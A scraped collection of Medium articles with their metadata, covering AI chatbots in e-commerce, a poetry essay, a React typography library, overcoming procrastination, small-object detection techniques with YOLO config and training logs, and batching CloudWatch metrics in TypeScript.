with limited work hours. Chatbots automate the process and can operate 24/7. Chatbots are gaining ground. Apart from potentially changing the industry, implementing a chatbot can be a good marketing campaign. Any company that wants to stay ahead in the race needs to follow this trend. Discover Latest Jobs in Bots, NLP, AI, ML, NLU & More
https://medium.com/gobeyond-ai/top-5-use-cases-of-ai-in-ecommerce-88c9b8d58bc7
['Mayank Pratap']
2020-02-24 13:11:46.912000+00:00
['AI', 'Artificial Intelligence', 'Ai Development', 'Ai In Ecommerce', 'Ecommerce']
The Tragedy Of Poetry Appreciation
A poetry appreciation class is to poems, what applesauce is to apples. We eat applesauce at room temperature, no chewing required, and in a mouth that breeds sadness. Similarly, we teach poetry appreciation in tame, extra-credit, cage-like places where eyes dart for the clock, pleading how much longer? Applesauce is a consolation prize. It is a bland, formless, disappointing mush that they once served, small white bowls with thin green stripes around the edges in elementary schools. To be clear, apples themselves are delightful, delicious, succulent gifts from the happiest gods. They include thousands of varieties. My taste buds dance the Bossa nova in anticipation of sinking my teeth into one of those magnificent manifestations of nature’s bounty. But let’s talk about poems, how those little engines of magic, pump their ideas, feelings, and wisdom deep into broken hearts and souls’ infrastructure. Let’s talk about how even well-meaning poetry appreciation classes strain the muscle, fiber, and power from poetry. Striping away its lightning, its rolling thunder, its winds and storms and aching hearts. Why can’t we just let poetry appreciation simply slip away like applesauce? It may still exist in a faraway tepid and tasteless cafeteria, but thanks to a merciful God, we no longer have to eat it.
https://medium.com/literally-literary/the-tragedy-of-poetry-appreciation-39ba085b7f32
['Dale Biron']
2020-09-25 05:32:57.058000+00:00
['Creativity', 'Writing', 'Poetry']
How I Built Grotesk, a React Component (and CSS Library) That Makes Web Type Simple
How I Built Grotesk, a React Component (and CSS Library) That Makes Web Type Simple Typography styles, simplified What’s Grotesk? Grotesk is a CSS library and React component that aims to make web typography simple. The reason I built it is because I’ve noticed I start almost every static website off with the same set of themes or typographic rules, so I decided to build a tiny library I can just plug into my next project easily. Since I mostly only work on React applications and plain ol’ static websites, I made a React component and a CSS library.
https://medium.com/better-programming/how-i-built-grotesk-a-react-component-and-css-library-that-makes-web-type-simple-a84b832aeb00
['Kartik Nair']
2020-03-03 06:34:42.647000+00:00
['CSS', 'Programming', 'Design', 'React', 'JavaScript']
Focus on Having a Good Time to Beat Your Procrastination
Focus on Having a Good Time to Beat Your Procrastination Focusing on micro-managing our time, just creates more boring chores to procrastinate over! Photo by Marcin Dampc from Pexels Procrastination has been my archenemy for at least 2 decades, and it has led to problems in work, in my relationships, and in life in general. It took me years of research and trying different approaches to eventually solve my procrastination problem. Most people find focusing on micro-managing their time is an important element in beating their procrastination. However, it does present two additional problems to the serial procrastinator. First, you have to beat your procrastination long enough to put the methods into action. Second, these methods are extra chores that your brain will procrastinate over. After spending years trying to manage my procrastination, I looked at the root causes of my procrastination and the reasoning behind them. By addressing what I found and managing my periods of procrastination, I could master my procrastination. Why Do We Procrastinate? Photo by Pixabay from Pexels Most of us procrastinate because our subconscious brain is rebelling in some form or another. Your brain could be rebelling against; Deadlines, including ones you have set yourself. (Your brain doesn’t like anything that holds authority over it or limits its choices). Things it doesn’t enjoy doing. Things it does not find stimulating enough. Not doing something it enjoys, or it thinks is more important. Other people will have other reasons for their brain rebelling and procrastinating but rarely is procrastination just laziness. The one common thing that runs through all the reasons is that your brain craves a better quality of life for itself. So, it simply rebels against anything that gets in its way of a better quality of life. It rebels against meeting that deadline. It rebels against doing things it doesn’t like. It rebels against anything that stops it from getting an instant hit of fun. Your brain is sulking like a naughty toddler who doesn’t get its way. For a more in-depth look at this phenomenon, I recommend reading the Chimp Paradox by Dr. Steve Peters. In short, your brain is simply seeking a better quality of life and wants to ignore anything that gets in its way. The Endless Procrastination Cycle Procrastination can become an endless cycle that gets harder to break the longer it goes on. Now a lot of us are working from home, we find procrastination is an easy trap to fall into. After all, no one can see if you are working or not. So, to make up for our procrastination, we work a bit longer than normal. Then we spend our evenings stressing about what we didn’t achieve during the day and how we will catch up in the morning. Eventually, the worry will start keeping you up at night. Before you know it, all of your quality time has been eaten up by work and stress. The tasks you procrastinated over now occupy your mind when you should be spending quality time with your friends and family. It keeps you awake at night and your brain’s quality of life declines further and further. The more your brain’s quality of life declines, the more it will find things to procrastinate over while it seeks a better quality of life. And so, the cycle continues downwards. Play Hard, Then Work Hard Photo by Vincent Gerbouin from Pexels So, I looked for ways of improving my brain’s quality of life and immediately ran into a problem. My brain is conditioned to believe that rewards come after hard work, and not before. So, my first plan was to promise myself treats if I completed a task. For the brains of non-procrastinators, this works really well. Unfortunately, the brains of procrastinators don’t normally work that way. They want the rewards now. My mind instantly rebelled against working for treats and started procrastinating again. It didn’t care what the size of my promised reward was, my brain kept on procrastinating because it wanted a better quality of life now, not later. So, I flipped things on their head and just took all the rewards I promised myself, regardless of any tasks I had completed or not. I made a conscious effort to fill my spare time with quality activities including; Spending quality time with my family and grandchildren Playing video games (something I have loved since the 80s) Country walks DIY / Gardening projects Learning to cook Blasting out my favorite tunes Binge-watching TV shows and films I also made other quality of life adjustments, such as removing my works email and messaging software off my phone. And I banned my phone from the bedroom and replaced it with a traditional alarm clock. This greatly limited how much my work life invaded my spare time and my quality of life. By filling my spare time with these quality activities, I achieved two things. First, I improved my brain’s quality of life by giving it what it craved. Second, I starved my brain of time to stress over my procrastination stopping the endless procrastination cycle. The first two weeks were hard, as I had to overcome decades of unhealthy habits. The biggest of which was a tendency to think work always came above and before everything else in life. The results were amazing. After the initial two weeks of setting up better habits, it only took a week or two for my procrastination at work to drop. Then my ability to study improved, and finally my relationships improved. 6 months later my procrastination is all but gone. Like most people, I still have tasks I hate doing and I drag my feet over them, but now they are manageable with simple time management techniques. With my brain experiencing a better quality of life, my time micro-management techniques stop being an extra chore to procrastinate over. Instead, they became more powerful and easier to implement and maintain. The Takeaways Photo by Blu Byrd from Pexels For most people, there is a lot to be said for the phrase “Work hard, play hard”, however, for procrastinators it is backward. We need to play hard and then work hard. If you use techniques to micro-manage your procrastination periods, hold on to them — they will play an even bigger role in the future. Improving your brain’s quality of life will make them as powerful as you initially hoped they would be. By improving your brain’s quality of life, you remove the primary reason for your brain to procrastinate over chores. Time micro-management techniques will still help make more effective use of your time and get through those times when your brain sulks for no apparent reason.
https://medium.com/swlh/focus-on-having-a-good-time-to-beat-your-procrastination-8660c0bb34c4
['Sammy Jones']
2020-12-19 22:20:25.567000+00:00
['Management', 'Life Lessons', 'Startup', 'Entrepreneurship', 'Business']
Tackling the Small Object Problem in Object Detection
Tackling the Small Object Problem in Object Detection Note: we have also published Tackling the Small Object Problem on our blog. Detecting small objects is one of the most challenging and important problems in computer vision. In this post, we will discuss some of the strategies we have developed at Roboflow by iterating on hundreds of small object detection models. Small objects as seen from above by drone in the public aerial maritime dataset To improve your model’s performance on small objects, we recommend the following techniques: If you prefer video, I have also recorded a discussion of this post Why is the Small Object Problem Hard? The small object problem plagues object detection models worldwide. Not buying it? Check the COCO evaluation results for recent state of the art models YOLOv3, EfficientDet, and YOLOv4: Check out AP_S, AP_M, AP_L for state of the art models. Small objects are hard! (cite) In EfficientDet for example, AP on small objects is only 12%, held up against an AP of 51% for large objects. That is almost a five fold difference! So why is detecting small objects so hard? It all comes down to the model. Object detection models form features by aggregating pixels in convolutional layers. Feature aggregation for object detection in PP-YOLO And at the end of the network a prediction is made based on a loss function, which sums up across pixels based on the difference between prediction and ground truth. The loss function in YOLO If the ground truth box is not large, the signal will small while training is occurring. Furthermore, small objects are most likely to have data labeling errors, where their identification may be omitted. Empirically and theoretically, small objects are hard. Increasing your image capture resolution Resolution, resolution, resolution… it is all about resolution. Very small objects may contain only a few pixels within the bounding box — meaning it is very important to increase the resolution of your images to increase the richness of features that your detector can form from that small box. Therefore, we suggest capturing as high of resolution images as possible, if possible. Increasing your model’s input resolution Once you have your images at higher resolution, you can scale up your model’s input resolution. Warning: this will result in a large model that takes longer to train, and will be slower to infer when you start deployment. You may have to run experiments to find out the right tradeoff of speed with performance. You can easily scale your input resolution in our tutorial on training YOLOv4 by changing image size in the config file. [net] batch=64 subdivisions=36 width={YOUR RESOLUTION WIDTH HERE} height={YOUR RESOLUTION HEIGHT HERE} channels=3 momentum=0.949 decay=0.0005 angle=0 saturation = 1.5 exposure = 1.5 hue = .1 learning_rate=0.001 burn_in=1000 max_batches=6000 policy=steps steps=4800.0,5400.0 scales=.1,.1 You can also easily scale your input resolution in our tutorial on how to train YOLOv5 by changing the image size parameter in the training command: !python train.py --img {YOUR RESOLUTON SIZE HERE} --batch 16 --epochs 10 --data '../data.yaml' --cfg ./models/custom_yolov5s.yaml --weights '' --name yolov5s_results --cache Note: you will only see improved results up to the maximum resolution of your training data. Tiling your images Another great tactic for detecting small images is to tile your images as a preprocessing step. Tiling effectively zooms your detector in on small objects, but allows you to keep the small input resolution you need in order to be able to run fast inference. Tiling images as a preprocessing step in Roboflow If you use tiling during training, it is important to remember that you will also need to tile your images at inference time. Generating More Data Via Augmentation Data augmentation generates new images from your base dataset. This can be very useful to prevent your model from overfitting to the training set. Some especially useful augmentations for small object detection include random crop, random rotation, and mosaic augmentation. Auto Learning Model Anchors Anchor boxes are prototypical bounding boxes that your model learns to predict in relation to. That said, anchor boxes can be preset and sometime suboptimal for your training data. It is good to custom tune these to your task at hand. Thankfully, the YOLOv5 model architecture does this for you automatically based on your custom data. All you have to do is kick off training. Analyzing anchors... anchors/target = 4.66, Best Possible Recall (BPR) = 0.9675. Attempting to generate improved anchors, please wait... WARNING: Extremely small objects found. 35 of 1664 labels are < 3 pixels in width or height. Running kmeans for 9 anchors on 1664 points... thr=0.25: 0.9477 best possible recall, 4.95 anchors past thr n=9, img_size=416, metric_all=0.317/0.665-mean/best, past_thr=0.465-mean: 18,24, 65,37, 35,68, 46,135, 152,54, 99,109, 66,218, 220,128, 169,228 Evolving anchors with Genetic Algorithm: fitness = 0.6825: 100%|██████████| 1000/1000 [00:00<00:00, 1081.71it/s] thr=0.25: 0.9627 best possible recall, 5.32 anchors past thr n=9, img_size=416, metric_all=0.338/0.688-mean/best, past_thr=0.476-mean: 13,20, 41,32, 26,55, 46,72, 122,57, 86,102, 58,152, 161,120, 165,204 Filtering Out Extraneous Classes Class management is an important technique to improve the quality of your dataset. If you have one class that is significantly overlapping with another class, you should filter this class from your dataset. And perhaps, you decide that the small object in your dataset is not worth detecting, so you may want to take it out. You can quickly identify all of these issues with the Advanced Dataset Health Check that is a part of Roboflow Pro. Class omission and class renaming are all possible through Roboflow’s ontology management tools. Conclusion Properly detecting small objects is truly a challenge. In this post, we have discussed a few strategies for improving your small object detector, namely: As always, happy detecting!
https://towardsdatascience.com/tackling-the-small-object-problem-in-object-detection-6e1c9976ee69
['Jacob Solawetz']
2020-10-12 14:31:18.087000+00:00
['Artificial Intelligence', 'Data Science', 'Object Detection', 'Computer Vision', 'Deep Learning']
Benchmarking API Endpoints With TypeScript Decorators
Publishing CloudWatch Metrics With the API set up, I want it to send metrics to CloudWatch so we can use it later. But first, I will quickly go through some basic CloudWatch concepts if you’ve never used them before. If you want to dive more into it, I found this post by Mathew Kenny Thomas which explains each concept in more detail. CloudWatch is a monitoring service offered by AWS. There are namespaces in CloudWatch that serve as containers for the metrics that we publish. Usually, each application publishes metrics with a unique namespace within an organization. You can think of these metrics as sets of data representing the value of a variable over time. For example, this variable can be the CPU usage of an EC2 instance and the data points represent the percentage utilization of CPU over time. You can also define your own custom metrics and publish them to CloudWatch, and then you can retrieve statistics about them by creating a dashboard. That’s what we will be doing here. I created a utility class for it: A metric in CloudWatch has dimensions, which are name/value pairs that are part of the identity of a metric. We can associate a maximum of ten dimensions to a metric. On line 34, I added a dimension to indicate the environment of the API, to distinguish testing metrics from production. In addition, a metric has properties like the metric name, the value, and the unit of the data point. This type is defined by MetricData type on line 3. The _metricsQueue is used to batch metrics together to reduce AWS request calls. Each API call to use putMetricData costs money, and we can avoid that cost if we send multiple metrics in one go. Luckily, this method allows us to do that. The parameter of putMetricData is as follows: MetricData.member.N The data for the metric. The array can include no more than 20 metrics per call. This means the MetricData parameter that we pass into putMetricData can be an array of metrics, and each item has the type MetricData . So our class maintains a queue that stores up to ten metrics. When the queue is full, we publish all of them at once with namespace My API on line 57. We return the promise of the sdk call and let the controller handle the result. This is a very simple implementation of batching, but there is a more powerful library to handle this if you are looking to save some AWS costs. Mixmax made a blogpost showing how they saved a decent amount of operating cost by batching up metrics: “Batching CloudWatch metrics.” Now we have a utility that publishes metrics to CloudWatch, let’s see how we can use it inside a TypeScript decorator.
https://medium.com/better-programming/benchmarking-api-endpoints-with-typescript-decorators-27cd462be488
['Michael Chi']
2020-11-03 19:03:04.318000+00:00
['JavaScript', 'Web Development', 'Typescript', 'AWS', 'Programming']